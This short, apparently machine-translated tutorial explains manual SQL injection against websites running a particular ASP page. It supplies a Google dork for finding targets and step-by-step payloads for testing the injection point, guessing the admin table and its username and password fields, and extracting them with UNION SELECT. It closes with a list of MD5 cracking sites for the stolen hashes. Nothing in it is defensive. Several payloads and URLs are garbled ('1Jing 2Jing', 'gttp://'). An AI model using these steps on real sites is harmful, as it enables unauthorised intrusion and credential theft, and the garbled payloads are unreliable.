Manual injection method
Manual injection method: enter keywords in Google: inurl:encomphonorbig.asp?id= manual injection tutorial: 1, www.google.com.hk search: inurl:encomphonorbig.asp?id=2, determine injection point: and 1, and 1, vulnerabilities 3, judge database:'; -- and len ('a') = 1 4, guess table: and (select count (*) from admin), show normal that admin exists 5. Guess field: and (select count (username,password) from admin), show normal that username,password field exists 6, order by 5union select 1Jing 2Jing 3Jing 5Jing 5 from admin look at the webpage which bit is available (here if the third is available) union select 1pmmname4pr 5pr 5pr 4pl from admin
MD5 cracking:
Http://www.cmd5.comhttp://xmd5.orghttp://md5.syue.comgttp://md5.com.cngttp://md5.asia